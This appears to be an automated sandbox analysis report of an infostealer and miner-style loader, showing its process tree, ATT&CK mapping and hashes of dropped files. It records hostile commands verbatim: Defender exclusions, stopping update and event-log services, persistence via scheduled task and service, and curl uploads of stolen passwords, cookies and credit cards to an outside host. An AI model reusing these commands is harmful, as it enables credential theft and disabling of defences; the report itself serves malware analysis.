C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2700
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3116
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3216
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AaQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AawB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAagBmACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\R3nzSkin_Injector.exe"C:\Users\Admin\AppData\Local\Temp\R3nzSkin_Injector.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Users\Admin\AppData\Local\Update.exe"C:\Users\Admin\AppData\Local\Update.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\SecurityHealthServices.exe"C:\Users\Admin\AppData\Local\Temp\SecurityHealthServices.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1304
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4104 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3628 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2992 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3252 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1136 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:5084 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060 -
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KPAADCYR"4⤵
- Launches sc.exe
PID:4072 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KPAADCYR" binpath= "C:\ProgramData\xskudridktfu\vmarkghgnurz.exe" start= "auto"4⤵
- Launches sc.exe
PID:5008 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:4640 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KPAADCYR"4⤵
- Launches sc.exe
PID:4520 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1120
-
C:\Users\Admin\AppData\Local\SearchServices.exe"C:\Users\Admin\AppData\Local\SearchServices.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\SearchServices.exe"C:\Users\Admin\AppData\Local\SearchServices.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:848
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:924
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile"5⤵PID:3124
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:5308 -
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile6⤵PID:5664
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile"5⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:5796 -
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile6⤵PID:2576
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile"5⤵PID:6120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6096 -
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile6⤵PID:5856
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5856 -s 2127⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile"5⤵PID:5440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:5372 -
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile6⤵PID:5536
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5536 -s 2047⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile"5⤵PID:4600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:3744 -
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile6⤵PID:6128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile"5⤵PID:5844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6112 -
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile6⤵PID:6016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupSet.emf" https://store2.gofile.io/uploadFile"5⤵PID:3092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3184
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin/Downloads/BackupSet.emf" https://store2.gofile.io/uploadFile6⤵PID:5264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3584
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4000
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4088
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4088 -s 43402⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5744
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4148
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4900
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3296
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1452
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:4456
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵PID:1360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b4,0x7fff9f0a2e98,0x7fff9f0a2ea4,0x7fff9f0a2eb02⤵PID:4960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2388 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:32⤵PID:1900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3912 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:82⤵PID:5612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:2404
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:4040
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 742ae1f984078405770d74a2716b8edc AkLZK3yLFkGGThe+2Rr5cQ.0.1.0.0.01⤵PID:4792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:4128
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4676
-
C:\ProgramData\xskudridktfu\vmarkghgnurz.exeC:\ProgramData\xskudridktfu\vmarkghgnurz.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2344 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2716
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5760
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5324
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5560
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3096
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5500 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2088
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:5988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5084
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:6012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5960
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:2424
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2972
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:6028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4928
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:3872
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4012
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:3716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2092 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 5856 -ip 58562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5944 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 500 -p 4088 -ip 40882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5948 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 5536 -ip 55362⤵PID:5588
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5536
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{2F519BF2-C697-59F8-8F6A-1E19509CE66B}
Filesize36KB
MD58aaad0f4eb7d3c65f81c6e6b496ba889
SHA1231237a501b9433c292991e4ec200b25c1589050
SHA256813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA5121a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel
Filesize36KB
MD5fb5f8866e1f4c9c1c7f4d377934ff4b2
SHA1d0a329e387fb7bcba205364938417a67dbb4118a
SHA2561649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170
SHA5120fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c
-
Filesize
18.4MB
MD5e1a89533c793df50a2212239cf040d91
SHA18549771a01e7ca91441d33b7375ab712f41f1cd1
SHA2560fb35485938dec157971088752c6a92be30ed423ab7a59146b137d4db1b1ba94
SHA512a0f2f74c2f56e46a81b812f0dc0aefacb5e8578e556c93e9a1d8bc6ec6024c316f9aa56809a2b50b9f848f92276dd87d15a18026fbb66e55a79adb1b3e6db29f
-
Filesize
299KB
MD58af17734385f55dc58f1ca38bce22312
SHA16983464a9c6391bdd1e7b0aa275acf0a49c12d76
SHA256ea034d7b08a538f827293c3b0742d4c178708afdfd0f45d47cad99967b311a97
SHA51261c076bd92de12fa0c48ca5e4b5ea263c3d4e39e9821bdabc98a84ed0d37d40065095e7ea08bfd35fd47d9fa27b7f6053992844044b9f5d6677ea7a19e25b024
-
Filesize
2.8MB
MD55143fe6d0c9218c03877131e7ff8f195
SHA14bb288f628d2e6d498f79196d7b94400f6e4a3c0
SHA256cc0323377f6720d55fe5fffb473bab139a6b3c26b2ff9f5b0433caad1fdb3280
SHA5129c4194ea2dfd10267ed8fc2b21d6b82a1425254cd6bae28e4727ee93ff4b1888db24fb92ae8a1a7e46759ad39db45dff774b2f2795ca115df3e0166a3821c291
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
81KB
MD5bbe89cf70b64f38c67b7bf23c0ea8a48
SHA144577016e9c7b463a79b966b67c3ecc868957470
SHA256775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723
SHA5123ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1
-
Filesize
119KB
MD5ca4cef051737b0e4e56b7d597238df94
SHA1583df3f7ecade0252fdff608eb969439956f5c4a
SHA256e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b
SHA51217103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3
-
Filesize
153KB
MD50a94c9f3d7728cf96326db3ab3646d40
SHA18081df1dca4a8520604e134672c4be79eb202d14
SHA2560a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31
SHA5126f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087
-
Filesize
21KB
MD5e8b9d74bfd1f6d1cc1d99b24f44da796
SHA1a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452
SHA256b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59
SHA512b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27
-
Filesize
21KB
MD5cfe0c1dfde224ea5fed9bd5ff778a6e0
SHA15150e7edd1293e29d2e4d6bb68067374b8a07ce6
SHA2560d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e
SHA512b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000
-
Filesize
21KB
MD533bbece432f8da57f17bf2e396ebaa58
SHA1890df2dddfdf3eeccc698312d32407f3e2ec7eb1
SHA2567cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e
SHA512619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5
-
Filesize
21KB
MD5eb0978a9213e7f6fdd63b2967f02d999
SHA19833f4134f7ac4766991c918aece900acfbf969f
SHA256ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e
SHA5126f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63
-
Filesize
25KB
MD5efad0ee0136532e8e8402770a64c71f9
SHA1cda3774fe9781400792d8605869f4e6b08153e55
SHA2563d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed
SHA51269d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852
-
Filesize
21KB
MD51c58526d681efe507deb8f1935c75487
SHA10e6d328faf3563f2aae029bc5f2272fb7a742672
SHA256ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2
SHA5128edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1
-
Filesize
18KB
MD5bfffa7117fd9b1622c66d949bac3f1d7
SHA1402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA2561ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f
-
Filesize
21KB
MD5e89cdcd4d95cda04e4abba8193a5b492
SHA15c0aee81f32d7f9ec9f0650239ee58880c9b0337
SHA2561a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238
SHA51255d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e
-
Filesize
21KB
MD5accc640d1b06fb8552fe02f823126ff5
SHA182ccc763d62660bfa8b8a09e566120d469f6ab67
SHA256332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f
SHA5126382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe
-
Filesize
21KB
MD5c6024cc04201312f7688a021d25b056d
SHA148a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd
SHA2568751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500
SHA512d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47
-
Filesize
21KB
MD51f2a00e72bc8fa2bd887bdb651ed6de5
SHA104d92e41ce002251cc09c297cf2b38c4263709ea
SHA2569c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142
